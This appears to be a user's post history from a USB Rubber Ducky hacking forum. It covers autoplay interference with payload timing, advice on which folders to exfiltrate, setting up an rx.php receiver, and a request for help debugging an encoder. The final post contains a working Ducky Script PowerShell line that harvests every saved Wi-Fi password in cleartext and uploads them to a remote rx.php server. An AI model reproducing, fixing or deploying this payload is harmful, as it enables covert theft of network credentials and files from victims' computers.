voidnecron_
-
Posts
6 -
Joined
-
Last visited
Posts posted by voidnecron_
-
-
Hi,
I have ran into a slight disadvantage of using twinduck firmware.
Most Windows versions will auto mount and open the USB drive.
This kind of messes with my delays and active windows, causing the duck to 'type' into an explorer window rather then the powershell or run prompt.
Any way of disabling or delaying this Windows behaviour?Cheers,
Void -
Cribbit has a good point, but this will take forever though.
If you have limited time to extract you could consider using %homepath% to see where Windows stores files by default. In most company GPO's this will be directed to some network drive.
%temp% could have interesting stuff as well.
Cheers. -
Why would you netcat if you use the rx.php script?
Just look into the web directory where rx.php is located and there should be all the files created by the script.
Tip: Check the apache error log, in my case the use apache runs with (www-data) didn't have write permissions in this folder and thus the rx.php couldn't create files. -
I can't seem to edit my post, but here's the output picture to see the result.
-
Hi all,
I've created a ducky script which works fine when I execute the commands by hand, but fails after being encoded and run with the duck.
The line in the code is:STRING $d=netsh wlan show profiles|sls -Pattern 'All User'|Foreach{$_.ToString()};$c=$d|Foreach{$_.Replace(' All User Profile : ',$null)};$z=ForEach($w in $c){netsh wlan show profiles $w key=clear};$p=$z|sls -Pattern 'SSID name','Key Content';(New-Object Net.WebClient).UploadString('http://IP_REMOVED/rx.php', $p)However the quote between -Pattern and All User is being dropped, as well as a single space from ' All User Profile'.
Does anyone know why the encoding fails/does this? Bug in encoder?
Cheers,
Void
encoder drops chars which fails script
in Suggestions / Bug reports
Posted
Really, nobody?